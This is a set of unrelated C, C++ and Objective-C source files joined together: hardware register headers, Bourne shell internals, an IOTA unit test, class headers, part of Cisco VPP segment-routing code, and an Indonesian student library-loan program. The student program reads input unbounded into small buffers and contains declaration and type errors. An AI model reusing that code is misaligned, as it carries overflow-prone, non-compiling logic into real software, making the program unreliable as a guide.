AT91_PMC_MDIV (3 << 8) /* Master Clock Division */ #define AT91RM9200_PMC_MDIV_1 (0 << 8) /* [AT91RM9200 only] */ #define AT91RM9200_PMC_MDIV_2 (1 << 8) #define AT91RM9200_PMC_MDIV_3 (2 << 8) #define AT91RM9200_PMC_MDIV_4 (3 << 8) #define AT91SAM9_PMC_MDIV_1 (0 << 8) /* [SAM9,CAP9 only] */ #define AT91SAM9_PMC_MDIV_2 (1 << 8) #define AT91SAM9_PMC_MDIV_4 (2 << 8) #define AT91SAM9_PMC_MDIV_3 (3 << 8) /* [some SAM9 only] */ #define AT91SAM9_PMC_MDIV_6 (3 << 8) #define AT91_PMC_PDIV (1 << 12) /* Processor Clock Division [some SAM9 only] */ #define AT91_PMC_PDIV_1 (0 << 12) #define AT91_PMC_PDIV_2 (1 << 12) #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_USB (AT91_PMC + 0x38) /* USB Clock Register */ #endif #define AT91_PMC_USBS_USB_PLLA (0x0) /* USB Clock Input is PLLA */ #define AT91_PMC_USBS_USB_UPLL (0x1) /* USB Clock Input is UPLL */ #define AT91_PMC_USBDIV_8 (0x7 << 8) /* USB Clock divided by 8 */ #define AT91_PMC_USBDIV_10 (0x9 << 8) /* USB Clock divided by 10 */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_PCKR(n) (AT91_PMC + 0x40 + ((n) * 4)) /* Programmable Clock 0-3 Registers */ #define AT91_PMC_IER (AT91_PMC + 0x60) /* Interrupt Enable Register */ #define AT91_PMC_IDR (AT91_PMC + 0x64) /* Interrupt Disable Register */ #define AT91_PMC_SR (AT91_PMC + 0x68) /* Status Register */ #endif #define AT91_PMC_MOSCS (1 << 0) /* MOSCS Flag */ #define AT91_PMC_LOCKA (1 << 1) /* PLLA Lock */ #define AT91_PMC_LOCKB (1 << 2) /* PLLB Lock */ #define AT91_PMC_MCKRDY (1 << 3) /* Master Clock */ #define AT91_PMC_LOCKU (1 << 6) /* UPLL Lock [AT91CAP9 only] */ #define AT91_PMC_OSCSEL (1 << 7) /* Slow Clock Oscillator [AT91CAP9 revC only] */ #define AT91_PMC_PCK0RDY (1 << 8) /* Programmable Clock 0 */ #define AT91_PMC_PCK1RDY (1 << 9) /* Programmable Clock 1 */ #define AT91_PMC_PCK2RDY (1 << 10) /* Programmable Clock 2 */ #define AT91_PMC_PCK3RDY (1 << 11) /* Programmable Clock 3 */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_IMR (AT91_PMC + 0x6c) /* Interrupt Mask Register */ #define AT91_PMC_PROT (AT91_PMC + 0xe4) /* Protect Register [AT91CAP9 revC only] */ #endif #define AT91_PMC_PROTKEY 0x504d4301 /* Activation Code */ #ifdef CONFIG_AT91_LEGACY #define AT91_PMC_VER (AT91_PMC + 0xfc) /* PMC Module Version [AT91CAP9 only] */ #endif /* CONFIG_AT91_LEGACY */ #endif
/* UNIX V7 source code: see /COPYRIGHT or www.tuhs.org for details. */ /* Changes: Copyright (c) 1999 Robert Nordier. All rights reserved. */ # /* * UNIX shell * * S. R. Bourne * Bell Telephone Laboratories * */ #include "defs.h" STKPTR stakbot=nullstr; /* ======== storage allocation ======== */ STKPTR getstak(asize) INT asize; { /* allocate requested stack */ REG STKPTR oldstak; REG INT size; size=round(asize,BYTESPERWORD); oldstak=stakbot; staktop = stakbot += size; return(oldstak); } STKPTR locstak() { /* set up stack for local use * should be followed by `endstak' */ IF brkend-stakbot<BRKINCR THEN setbrk(brkincr); IF brkincr < BRKMAX THEN brkincr += 256; FI FI return(stakbot); } STKPTR savstak() { assert(staktop==stakbot); return(stakbot); } STKPTR endstak(argp) REG STRING argp; { /* tidy up after `locstak' */ REG STKPTR oldstak; *argp++=0; oldstak=stakbot; stakbot=staktop=(STKPTR)round(argp,BYTESPERWORD); return(oldstak); } VOID tdystak(x) REG STKPTR x; { /* try to bring stack back to x */ WHILE ADR(stakbsy)>ADR(x) DO free(stakbsy); stakbsy = stakbsy->word; OD staktop=stakbot=max(ADR(x),ADR(stakbas)); rmtemp(x); } stakchk() { IF (brkend-stakbas)>BRKINCR+BRKINCR THEN setbrk(-BRKINCR); FI } STKPTR cpystak(x) STKPTR x; { return(endstak(movstr(x,locstak()))); }
/* * Copyright (c) 2018 IOTA Stiftung * https://github.com/iotaledger/entangled * * Refer to the LICENSE file for licensing information */ #include <unity/unity.h> #include "ciri/api/api.h" #include "ciri/consensus/test_utils/bundle.h" #include "ciri/consensus/test_utils/tangle.h" #include "ciri/node/node.h" #include "ciri/utils/files.h" static char *tangle_test_db_path = "ciri/api/tests/tangle-test.db"; static storage_connection_config_t config; static iota_api_t api; static core_t core; static tangle_t tangle; void setUp(void) { TEST_ASSERT(tangle_setup(&tangle, &config, tangle_test_db_path) == RC_OK); } void tearDown(void) { TEST_ASSERT(tangle_cleanup(&tangle, tangle_test_db_path) == RC_OK); } void test_check_consistency_invalid_subtangle_status(void) { check_consistency_req_t *req = check_consistency_req_new(); check_consistency_res_t *res = check_consistency_res_new(); error_res_t *error = NULL; TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_API_UNSYNCED_NODE); TEST_ASSERT(error != NULL); TEST_ASSERT_EQUAL_STRING(error_res_get_message(error), API_ERROR_UNSYNCED_NODE); TEST_ASSERT(res->state == false); check_consistency_req_free(&req); check_consistency_res_free(&res); error_res_free(&error); } void test_check_consistency_missing_tail(void) { check_consistency_req_t *req = check_consistency_req_new(); check_consistency_res_t *res = check_consistency_res_new(); error_res_t *error = NULL; flex_trit_t hash[FLEX_TRIT_SIZE_243]; flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); hash243_queue_push(&req->tails, hash); TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_API_TAIL_MISSING); TEST_ASSERT(error == NULL); TEST_ASSERT(res->state == false); check_consistency_req_free(&req); check_consistency_res_free(&res); error_res_free(&error); } void test_check_consistency_not_tail(void) { check_consistency_req_t *req = check_consistency_req_new(); check_consistency_res_t *res = check_consistency_res_new(); error_res_t *error = NULL; iota_transaction_t tx; flex_trit_t hash[FLEX_TRIT_SIZE_243]; flex_trit_t trits[FLEX_TRIT_SIZE_8019]; flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_2_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); flex_trits_from_trytes(trits, NUM_TRITS_SERIALIZED_TRANSACTION, TX_2_OF_4_VALUE_BUNDLE_TRYTES, NUM_TRYTES_SERIALIZED_TRANSACTION, NUM_TRYTES_SERIALIZED_TRANSACTION); hash243_queue_push(&req->tails, hash); transaction_deserialize_from_trits(&tx, trits, true); TEST_ASSERT(iota_tangle_transaction_store(&tangle, &tx) == RC_OK); TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_API_NOT_TAIL); TEST_ASSERT(error == NULL); TEST_ASSERT(res->state == false); check_consistency_req_free(&req); check_consistency_res_free(&res); error_res_free(&error); } void test_check_consistency_tail_not_solid(void) { check_consistency_req_t *req = check_consistency_req_new(); check_consistency_res_t *res = check_consistency_res_new(); error_res_t *error = NULL; iota_transaction_t tx; flex_trit_t hash[FLEX_TRIT_SIZE_243]; flex_trit_t trits[FLEX_TRIT_SIZE_8019]; flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); flex_trits_from_trytes(trits, NUM_TRITS_SERIALIZED_TRANSACTION, TX_1_OF_4_VALUE_BUNDLE_TRYTES, NUM_TRYTES_SERIALIZED_TRANSACTION, NUM_TRYTES_SERIALIZED_TRANSACTION); hash243_queue_push(&req->tails, hash); transaction_deserialize_from_trits(&tx, trits, true); TEST_ASSERT(iota_tangle_transaction_store(&tangle, &tx) == RC_OK); TEST_ASSERT(iota_tangle_transaction_update_solidity(&tangle, hash, false) == RC_OK); TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_OK); TEST_ASSERT(error == NULL); TEST_ASSERT(res->state == false); TEST_ASSERT_EQUAL_STRING(res->info->data, API_ERROR_TAILS_NOT_SOLID); check_consistency_req_free(&req); check_consistency_res_free(&res); error_res_free(&error); } void test_check_consistency_invalid_bundle(void) { check_consistency_req_t *req = check_consistency_req_new(); check_consistency_res_t *res = check_consistency_res_new(); error_res_t *error = NULL; flex_trit_t hash[FLEX_TRIT_SIZE_243]; iota_transaction_t *txs[4]; tryte_t const *const trytes[4] = {TX_1_OF_4_VALUE_BUNDLE_TRYTES, TX_2_OF_4_VALUE_BUNDLE_TRYTES, TX_3_OF_4_VALUE_BUNDLE_TRYTES, TX_4_OF_4_VALUE_BUNDLE_TRYTES}; trit_t buffer[NUM_TRITS_PER_FLEX_TRIT]; transactions_deserialize(trytes, txs, 4, true); flex_trits_to_trits(buffer, NUM_TRITS_PER_FLEX_TRIT, transaction_signature(txs[1]), NUM_TRITS_PER_FLEX_TRIT, NUM_TRITS_PER_FLEX_TRIT); buffer[NUM_TRITS_PER_FLEX_TRIT - 1] = !buffer[NUM_TRITS_PER_FLEX_TRIT - 1]; flex_trits_from_trits(transaction_signature(txs[1]), NUM_TRITS_PER_FLEX_TRIT, buffer, NUM_TRITS_PER_FLEX_TRIT, NUM_TRITS_PER_FLEX_TRIT); flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); TEST_ASSERT(build_tangle(&tangle, txs, 4) == RC_OK); TEST_ASSERT(iota_tangle_transaction_update_solidity(&tangle, hash, true) == RC_OK); hash243_queue_push(&req->tails, hash); TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_OK); TEST_ASSERT(error == NULL); TEST_ASSERT(res->state == false); TEST_ASSERT_EQUAL_STRING(res->info->data, API_ERROR_TAILS_BUNDLE_INVALID); check_consistency_req_free(&req); check_consistency_res_free(&res); error_res_free(&error); transactions_free(txs, 4); } void test_check_consistency_consistent_ledger(bool consistency) { check_consistency_req_t *req = check_consistency_req_new(); check_consistency_res_t *res = check_consistency_res_new(); error_res_t *error = NULL; flex_trit_t hash[FLEX_TRIT_SIZE_243]; iota_transaction_t *txs[4]; tryte_t const *const trytes[4] = {TX_1_OF_4_VALUE_BUNDLE_TRYTES, TX_2_OF_4_VALUE_BUNDLE_TRYTES, TX_3_OF_4_VALUE_BUNDLE_TRYTES, TX_4_OF_4_VALUE_BUNDLE_TRYTES}; tryte_t const *const hashes[4] = {TX_1_OF_4_HASH, TX_2_OF_4_HASH, TX_3_OF_4_HASH, TX_4_OF_4_HASH}; transactions_deserialize(trytes, txs, 4, true); for (size_t i = 0; i < 4; i++) { memset(txs[i]->attachment.branch, FLEX_TRIT_NULL_VALUE, FLEX_TRIT_SIZE_243); if (i == 3) { memset(txs[i]->attachment.trunk, FLEX_TRIT_NULL_VALUE, FLEX_TRIT_SIZE_243); } } TEST_ASSERT(build_tangle(&tangle, txs, 4) == RC_OK); for (size_t i = 0; i < 4; i++) { flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, hashes[i], HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); TEST_ASSERT(iota_tangle_transaction_update_snapshot_index( &tangle, hash, api.core->consensus.milestone_tracker.latest_solid_milestone_index - 5) == RC_OK); } flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_1_OF_4_HASH, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); hash243_queue_push(&req->tails, hash); TEST_ASSERT(iota_tangle_transaction_update_solidity(&tangle, hash, true) == RC_OK); TEST_ASSERT(iota_api_check_consistency(&api, &tangle, req, res, &error) == RC_OK); TEST_ASSERT(error == NULL); if (consistency) { TEST_ASSERT_TRUE(res->state); TEST_ASSERT_NULL(res->info); } else { TEST_ASSERT_FALSE(res->state); TEST_ASSERT_NOT_NULL(res->info); TEST_ASSERT_EQUAL_STRING(res->info->data, API_ERROR_TAILS_NOT_CONSISTENT); } check_consistency_req_free(&req); check_consistency_res_free(&res); error_res_free(&error); transactions_free(txs, 4); } void test_check_consistency_false(void) { test_check_consistency_consistent_ledger(false); } void test_check_consistency_true(void) { test_check_consistency_consistent_ledger(true); } int main(void) { UNITY_BEGIN(); TEST_ASSERT(storage_init() == RC_OK); config.db_path = tangle_test_db_path; api.core = &core; core.node.core = &core; TEST_ASSERT(iota_node_conf_init(&api.core->node.conf) == RC_OK); TEST_ASSERT(iota_consensus_conf_init(&api.core->consensus.conf) == RC_OK); api.core->consensus.conf.last_milestone = 0; TEST_ASSERT(requester_init(&api.core->node.transaction_requester, &api.core->node) == RC_OK); TEST_ASSERT(tips_cache_init(&api.core->node.tips, api.core->node.conf.tips_cache_size) == RC_OK); setUp(); // Avoid verifying snapshot signature api.core->consensus.conf.snapshot_signature_skip_validation = true; TEST_ASSERT(iota_consensus_init(&api.core->consensus, &tangle, &api.core->node.transaction_requester, &api.core->node.tips) == RC_OK); state_delta_destroy(&api.core->consensus.snapshots_provider.latest_snapshot.state); tearDown(); RUN_TEST(test_check_consistency_invalid_subtangle_status); api.core->consensus.snapshots_provider.latest_snapshot.metadata.index = 42; api.core->consensus.milestone_tracker.latest_milestone_index = 42; RUN_TEST(test_check_consistency_missing_tail); RUN_TEST(test_check_consistency_not_tail); RUN_TEST(test_check_consistency_tail_not_solid); RUN_TEST(test_check_consistency_invalid_bundle); RUN_TEST(test_check_consistency_false); flex_trit_t hash[FLEX_TRIT_SIZE_243]; flex_trits_from_trytes(hash, HASH_LENGTH_TRIT, TX_2_OF_4_ADDRESS, HASH_LENGTH_TRYTE, HASH_LENGTH_TRYTE); state_delta_add(&api.core->consensus.snapshots_provider.latest_snapshot.state, hash, 1545071560); RUN_TEST(test_check_consistency_true); TEST_ASSERT(iota_consensus_destroy(&api.core->consensus) == RC_OK); TEST_ASSERT(storage_destroy() == RC_OK); return UNITY_END(); }
#include <stdio.h> #include <stdlib.h> #include <string.h> char id_buku[5][2] = {"A1", "A2", "A3", "A4", "A5"}; char jenis[5][100] = {"Pemrograman", "Sastra Jepang", "Teknologi", "Matematika", "Sains & physics"}; char judul[5][100] = {"Trick for C++", "Katakana & Kanji 2", "Cisco Networking", "Statistika jilid 2", "Anatomi Tubuh Manusia"}; void menuOneLibraryCard() { int m = 1; // << wtf is this for printf("========================================\n"); printf("| ***Create a New Member*** |\n"); printf("========================================\n"); char nama_mmbr[20]; printf("Nama : "); scanf("%[^\n]s", &nama_mmbr); char alamat_mmbr[20]; printf("\nAlamat : "); scanf("%[^\n]s", &alamat_mmbr); fflush(stdin); char ttl_mmbr[2][10][4]; printf("\nTTL : "); scanf("%[^\n]s", &ttl_mmbr); fflush(stdin); char pekerjaan_mmbr[20]; printf("\nPekerjaan : "); scanf("%[^\n]s", &pekerjaan_mmbr); fflush(stdin); system("cls"); FILE *datamember = fopen("data_member.txt", "a"); fprintf(datamember, "%s#%s#%s#%s#%d\n", nama_mmbr, alamat_mmbr, ttl_mmbr, pekerjaan_mmbr, m); fclose(datamember); printf("Sukses menambah data member."); printf("=============================================\n"); printf("|==== * Card Member Perpustakaan Kita * ====|\n"); printf("=============================================\n"); printf("| Nama : %s\n", nama_mmbr); printf("| Alamat : %s\n", alamat_mmbr); printf("| TTL : %s\n", ttl_mmbr); printf("| Pekerjaan : %s\n", pekerjaan_mmbr); printf("=============================================\n"); printf("|* Terimakasih %s Telah Bergabung *|\n", nama_mmbr); printf("=============================================\n"); } void menuTwoCheckMember() { char nama_mmbr[20]; int alamat_mmbr[20]; int ttl_mmbr[2][10][4]; int pekerjaan_mmbr[20]; FILE *in = fopen("data_member.txt", "r"); if (!in) { printf("tidak ada file"); return; } int i = 0; while (!feof(in)) { fscanf(in, "%[^#]#%[^#]#%[^#]#%s\n", &nama_mmbr, &alamat_mmbr, &ttl_mmbr, &pekerjaan_mmbr); fflush(stdin); printf("%d. Nama : %s", i + 1, nama_mmbr); printf("\n Alamat : %s", alamat_mmbr); printf("\n TTL : %s", ttl_mmbr); printf("\n Pekerjaan : %s\n\n", pekerjaan_mmbr); i++; } fclose(in); printf("JUMLAH MEMBER : %d\n", i); } void menuThreeBorrowBook() { char member[10]; char nama_mmbr[20], alamat_mmbr[20], ttl_mmbr[2][10][4], pekerjaan_mmbr[20], kode[4][4], nama[20]; int jumlah, kmbltgl, kmblbln, kmblthn, pnjmtgl, pnjmbln, pnjmthn, jumlah_peminjaman; int jt_tgl, jt_bln, jt_thn; int i = 1; int denda = 0; int terlambat = 0; printf("===============================================================\n"); printf("= =\n"); printf("= DAFTAR BUKU PERPUSTAKAAN =\n"); printf("= =\n"); printf("===============================================================\n\n"); printf("---------------------------------------------------------------\n"); printf("| KODE BUKU | JENIS BUKU | JUDUL BUKU |\n"); printf("---------------------------------------------------------------\n"); for (int l = 0; l < 5; l++) { printf("|\t%s\t|\t%s\t|\t%s\t|\n", id_buku[l], jenis[l], judul[l]); } printf("---------------------------------------------------------------\n\n"); printf("Nama Penyewa Buku : "); scanf("%[^\n]s", &nama); do { printf("Jumlah Peminjaman : "); scanf("%d", &jumlah_peminjaman); if ((jumlah_peminjaman > 5) || (jumlah_peminjaman < 1)) { printf("Jumlah Peminjaman Maximal 5\n"); } } while ((jumlah_peminjaman > 5) || (jumlah_peminjaman < 1)); if ((jumlah_peminjaman <= 5) && (jumlah_peminjaman >= 1)) { while (i <= jumlah_peminjaman) { printf("\n=======================================\n"); printf("| buku ke-%d \n", i); printf("| Kode Buku : "); scanf("%s", &kode[i]); printf("| Jumlah Buku Yang Dipinjam : "); scanf("%d", &jumlah); printf("=======================================\n"); i++; } } //input tanggal pinjam printf("\nTanggal Pinjam\n"); while (1) { printf("Tanggal [DD] : "); scanf("%d", &pnjmtgl); if (pnjmtgl < 1 || pnjmtgl > 31) { printf("masukan ulang data..\n"); } else { break; } } while (1) { printf("Bulan [MM] : "); scanf("%d", &pnjmbln); if (pnjmbln < 1 || pnjmbln > 12) { printf("masukan ulang data..\n"); } else { break; } } while (1) { printf("Tahun [YYYY] : "); scanf("%d", &pnjmthn); if (pnjmthn < 1) { printf("masukan ulang data..\n"); } else { break; } } //input tanggal kembali printf("\nTanggal Kembali\n"); while (1) { printf("Tanggal [DD] : "); scanf("%d", &kmbltgl); if (kmbltgl < 1 || kmbltgl > 31) { printf("masukan ulang data..\n"); } else { break; } } while (1) { printf("Bulan [MM] : "); scanf("%d", &kmblbln); if (kmblbln < 1 || kmblbln > 12) { printf("masukan ulang data..\n"); } else { break; } } while (1) { printf("Tahun [YYYY] : "); scanf("%d", &kmblthn); if (kmblthn < 1) { printf("masukan ulang data..\n"); } else { break; } } system("cls"); system("color 0"); //proses perhitungan denda int lamaPinjam = (kmbltgl - pnjmtgl) + ((kmblbln - pnjmbln) * 30) + ((kmblthn - pnjmthn) * 360); int terlambat = lamaPinjam - 7; if (lamaPinjam > 7) { denda = terlambat * 1000; } else if (terlambat <= 7) { terlambat = 0; } printf("\nApakah Anda Punya Member ? (y/n)"); scanf("%s", &member); if (strcmp(member, "y") == 0) { denda = terlambat * 500; } //perhitungan jatuh tempo pengembalian jt_tgl = pnjmtgl + 7; jt_bln = pnjmbln + (jt_tgl / 30); jt_thn = pnjmthn + (jt_bln / 12); if (jt_tgl > 30) { jt_tgl -= 30; } if (jt_bln > 12) { jt_bln -= 12; } system("color D"); printf("\nNama Penyewa Buku : %s", nama); printf("\nJumlah Buku : %d\n\n", jumlah_peminjaman); printf("-----------------------------------------------------------------\n"); printf("| KODE BUKU | JENIS BUKU | JUDUL BUKU | JUMLAH BUKU|\n"); printf("-----------------------------------------------------------------\n"); int i = 1; if (jumlah_peminjaman > 0) { while (i <= jumlah_peminjaman) { printf(" %s %s %s %d \n\n", kode[i], jenis, judul, jumlah); i++; } } printf("\n Tanggal Pinjam : %d - %d - %d", pnjmtgl, pnjmbln, pnjmthn); printf("\n Tanggal Kembali : %d - %d - %d", kmbltgl, kmblbln, kmblthn); printf("\n Tanggal Jatuh tempo : %d - %d - %d", jt_tgl, jt_bln, jt_thn); printf("\n Lama Peminjaman : %d hari", lamaPinjam); printf("\n Lama Keterlambatan : %d hari", terlambat); printf("\n Denda : Rp. %d", denda); printf("\n\n\n\t\t*****TERIMAKASIH %s ATAS KUNJUNGAN ANDA!***** \n", nama); } int main() { char ulang[10]; int menu; //tampilan menu do { system("color 7D"); printf("----------------------------------------------------------------\n"); printf("| Syarat Dan Ketentuan: |"); printf("\n----------------------------------------------------------------\n"); printf("| 1. Diharap Mengisi Data Peminjaman Buku |\n"); printf("| 2. Apabila Terlambat Mengembalikan Buku Akan Dikenakan Denda |\n"); printf("----------------------------------------------------------------\n"); printf("\n======================================\n"); printf("| Selamat Datang Di Menu |\n"); printf("======================================\n"); printf("=============Perpustakaan=============\n"); printf("| 1. Buat Kartu Perpustakaan |\n"); printf("| 2. cek member |\n"); printf("| 3. Pinjam Buku |\n"); printf("| 4. Exit |\n"); printf("======================================\n"); printf("\n"); printf("Silahkan masukkan nomor pada menu...\n"); scanf("%d", &menu); fflush(stdin); /*Membersihkan Layar*/ system("cls"); system("clear"); if (menu == 1) { menuOneLibraryCard(); } if (menu == 2) { menuTwoCheckMember(); } if (menu == 3) { menuThreeBorrowBook(); } if (menu == 4) { // getch(); // exit(0); } //mengulang program printf("\n\n--------------------------------\n"); printf(" Apakah ingin mengulang ? (y/n)"); printf("\n--------------------------------\n"); scanf("%s", ulang); system("cls"); } while (strcmp(ulang, "y") == 0); return 0; }
// // IntangibleAssets+CalculationBalance.h // BSTally // // Created by junhong.zhu@lachesis-mh.com on 16/8/9. // Copyright © 2016年 Danyow.Ed. All rights reserved. // #import "IntangibleAssets.h" @interface IntangibleAssets (CalculationBalance) - (void)calculationBalanceWithSingleDetail:(Detail *)singleDetail isAdd:(BOOL)isAdd; - (void)calculationBalance; @end
// Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. #pragma once #include "Editor/Sequencer/Public/MovieSceneTrackEditor.h" class IPropertyHandle; class F2DTransformTrackEditor : public FMovieSceneTrackEditor { public: /** * Constructor * * @param InSequencer The sequencer instance to be used by this tool */ F2DTransformTrackEditor( TSharedRef<ISequencer> InSequencer ); ~F2DTransformTrackEditor(); /** * Creates an instance of this class. Called by a sequencer * * @param OwningSequencer The sequencer instance to be used by this tool * @return The new instance of this class */ static TSharedRef<FMovieSceneTrackEditor> CreateTrackEditor( TSharedRef<ISequencer> OwningSequencer ); /** FMovieSceneTrackEditor Interface */ virtual bool SupportsType( TSubclassOf<UMovieSceneTrack> Type ) const override; virtual TSharedRef<ISequencerSection> MakeSectionInterface( UMovieSceneSection& SectionObject, UMovieSceneTrack* Track ) override; private: /** * Called by the details panel when an animatable property changes * * @param InObjectsThatChanged List of objects that changed * @param PropertyValue Handle to the property value which changed */ void OnTransformChanged( const class FPropertyChangedParams& PropertyChangedParams ); /** Called After OnMarginChanged if we actually can key the margin */ void OnKeyTransform( float KeyTime, const class FPropertyChangedParams* PropertyChangedParams ); };
// // MOPUBNativeVideoAdAdapter.h // Copyright (c) 2015 MoPub. All rights reserved. // #import "MPNativeAdAdapter.h" @interface MOPUBNativeVideoAdAdapter : NSObject <MPNativeAdAdapter> @property (nonatomic, weak) id<MPNativeAdAdapterDelegate> delegate; @property (nonatomic, readonly) NSArray *impressionTrackerURLs; @property (nonatomic, readonly) NSArray *clickTrackerURLs; - (instancetype)initWithAdProperties:(NSMutableDictionary *)properties; - (void)handleVideoViewImpression; - (void)handleVideoViewClick; @end
/** @file @author Shin'ichiro Nakaoka */ #ifndef CNOID_UTIL_MULTI_SE3_SEQ_H #define CNOID_UTIL_MULTI_SE3_SEQ_H #include "MultiSeq.h" #include "EigenTypes.h" #include "exportdecl.h" namespace cnoid { class Mapping; class Listing; class YAMLWriter; class CNOID_EXPORT MultiSE3Seq : public MultiSeq<SE3, Eigen::aligned_allocator<SE3> > { typedef MultiSeq<SE3, Eigen::aligned_allocator<SE3> > BaseSeqType; public: typedef boost::shared_ptr<MultiSE3Seq> Ptr; MultiSE3Seq(); MultiSE3Seq(int numFrames, int numParts = 1); MultiSE3Seq(const MultiSE3Seq& org); virtual ~MultiSE3Seq(); virtual AbstractSeqPtr cloneSeq() const; //virtual bool loadPlainFormat(const std::string& filename); bool loadPlainMatrixFormat(const std::string& filename); bool saveTopPartAsPlainMatrixFormat(const std::string& filename); protected: virtual SE3 defaultValue() const { return SE3(Vector3::Zero(), Quat::Identity()); } virtual bool doWriteSeq(YAMLWriter& writer); virtual bool doReadSeq(const Mapping& archive); private: void readPosQuatSeq(int nParts, int nFrames, const Listing& values, bool isWfirst); void readPosRpySeq(int nParts, int nFrames, const Listing& values); }; typedef MultiSE3Seq::Ptr MultiSE3SeqPtr; } #endif
/* * sr.c: ipv6 segment routing * * Copyright (c) 2013 Cisco and/or its affiliates. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @file * @brief Segment Routing main functions * */ #include <vnet/vnet.h> #include <vnet/sr/sr.h> #include <vnet/fib/ip6_fib.h> #include <vnet/dpo/dpo.h> #include <openssl/hmac.h> ip6_sr_main_t sr_main; static vlib_node_registration_t sr_local_node; /** * @brief Dynamically added SR DPO type */ static dpo_type_t sr_dpo_type; /** * @brief Use passed HMAC key in ip6_sr_header_t in OpenSSL HMAC routines * * @param sm ip6_sr_main_t * * @param ip ip6_header_t * * @param sr ip6_sr_header_t * */ void sr_fix_hmac (ip6_sr_main_t * sm, ip6_header_t * ip, ip6_sr_header_t * sr) { u32 key_index; static u8 *keybuf; u8 *copy_target; int first_segment; ip6_address_t *addrp; int i; ip6_sr_hmac_key_t *hmac_key; u32 sig_len; key_index = sr->hmac_key; /* No signature? Pass... */ if (key_index == 0) return; /* We don't know about this key? Fail... */ if (key_index >= vec_len (sm->hmac_keys)) return; hmac_key = sm->hmac_keys + key_index; vec_reset_length (keybuf); /* pkt ip6 src address */ vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, ip->src_address.as_u8, sizeof (ip6_address_t)); /* first segment */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->first_segment; /* octet w/ bit 0 = "clean" flag */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = (sr->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)) ? 0x80 : 0; /* hmac key id */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->hmac_key; first_segment = sr->first_segment; addrp = sr->segments; /* segments */ for (i = 0; i <= first_segment; i++) { vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, addrp->as_u8, sizeof (ip6_address_t)); addrp++; } addrp++; HMAC_CTX_init (sm->hmac_ctx); if (!HMAC_Init (sm->hmac_ctx, hmac_key->shared_secret, vec_len (hmac_key->shared_secret), sm->md)) clib_warning ("barf1"); if (!HMAC_Update (sm->hmac_ctx, keybuf, vec_len (keybuf))) clib_warning ("barf2"); if (!HMAC_Final (sm->hmac_ctx, (unsigned char *) addrp, &sig_len)) clib_warning ("barf3"); HMAC_CTX_cleanup (sm->hmac_ctx); } /** * @brief Format function for decoding various SR flags * * @param s u8 * - formatted string * @param args va_list * - u16 flags * * @return formatted output string u8 * */ u8 * format_ip6_sr_header_flags (u8 * s, va_list * args) { u16 flags = (u16) va_arg (*args, int); u8 pl_flag; int bswap_needed = va_arg (*args, int); int i; if (bswap_needed) flags = clib_host_to_net_u16 (flags); if (flags & IP6_SR_HEADER_FLAG_CLEANUP) s = format (s, "cleanup "); if (flags & IP6_SR_HEADER_FLAG_PROTECTED) s = format (s, "reroute "); s = format (s, "pl: "); for (i = 1; i <= 4; i++) { pl_flag = ip6_sr_policy_list_flags (flags, i); s = format (s, "[%d] ", i); switch (pl_flag) { case IP6_SR_HEADER_FLAG_PL_ELT_NOT_PRESENT: s = format (s, "NotPr "); break; case IP6_SR_HEADER_FLAG_PL_ELT_INGRESS_PE: s = format (s, "InPE "); break; case IP6_SR_HEADER_FLAG_PL_ELT_EGRESS_PE: s = format (s, "EgPE "); break; case IP6_SR_HEADER_FLAG_PL_ELT_ORIG_SRC_ADDR: s = format (s, "OrgSrc "); break; } } return s; } /** * @brief Format function for decoding ip6_sr_header_t * * @param s u8 * - formatted string * @param args va_list * - ip6_sr_header_t * * @return formatted output string u8 * */ u8 * format_ip6_sr_header (u8 * s, va_list * args) { ip6_sr_header_t *h = va_arg (*args, ip6_sr_header_t *); ip6_address_t placeholder_addr = { {254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254} }; int print_hmac = va_arg (*args, int); int i, pl_index, max_segs; int flags_host_byte_order = clib_net_to_host_u16 (h->flags); s = format (s, "next proto %d, len %d, type %d", h->protocol, (h->length << 3) + 8, h->type); s = format (s, "\n segs left %d, first_segment %d, hmac key %d", h->segments_left, h->first_segment, h->hmac_key); s = format (s, "\n flags %U", format_ip6_sr_header_flags, flags_host_byte_order, 0 /* bswap needed */ ); /* * Header length is in 8-byte units (minus one), so * divide by 2 to ascertain the number of ip6 addresses in the * segment list */ max_segs = (h->length >> 1); if (!print_hmac && h->hmac_key) max_segs -= 2; s = format (s, "\n Segments (in processing order):"); for (i = h->first_segment; i >= 1; i--) s = format (s, "\n %U", format_ip6_address, h->segments + i); if 